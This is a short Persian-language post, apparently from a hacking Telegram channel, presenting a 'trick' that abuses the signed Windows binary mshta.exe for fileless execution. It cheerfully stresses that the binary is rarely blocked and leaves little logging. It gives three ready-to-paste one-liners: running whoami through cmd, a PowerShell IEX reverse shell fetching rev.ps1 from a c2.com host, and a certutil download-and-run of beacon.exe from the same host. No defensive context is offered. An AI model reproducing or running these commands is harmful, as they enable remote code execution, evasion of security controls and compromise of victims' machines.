💡
ترفند: mshta - ایجاد یک شل معکوس از طریق برنامه HTML🔺فکر میکنید mshta.exe فقط برای اجرای فایلهای .hta استفاده میشود؟ خندهدار است، اما نه. این یک فایل اجرایی مخفی ویندوز است که میتواند جاوااسکریپت و VBScript را مستقیماً از حافظه اجرا کند. این فایل توسط مایکروسافت امضا شده است، به ندرت مسدود میشود و حتی زمانی که PowerShell غیرفعال است، کار میکند. بریم سراغش!
🔺
؛mshta چه قابلیتهایی دارد (و چرا این موضوع عالی است)1⃣
اجرای اسکریپت از حافظه بدون فایل روی دیسکmshta.exe javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c whoami",1,true);close()این دستور cmd.exe را اجرا میکند و whoami را اجرا میکند. بدون ایجاد فایل، بدون ثبت رویداد در Event Viewer، مستقیماً از حافظه.
2⃣
ایجاد یک شل معکوس (بدون ذخیره روی دیسک)mshta.exe javascript:new ActiveXObject("WScript.Shell").Run("powershell -c IEX(New-Object Net.WebClient).DownloadString('http://c2.com/rev.ps1')",0,true);close()🔺این اسکریپت را از حافظه دانلود و اجرا میکند. PowerShell، اگر با -ExecutionPolicy Bypass اجرا شود، در تاریخچه ثبت نمیشود.
3⃣
دانلود بار مفید از یک سرور از راه دورmshta.exe javascript:new ActiveXObject("WScript.Shell").Run("certutil -urlcache -split -f http://c2.com/beacon.exe beacon.exe && beacon.exe",0,true);close()🔺ترکیب mshta و certutil به شما امکان میدهد یک فایل را بدون استفاده از PowerShell دانلود و اجرا کنید.
t.me/Hack4Man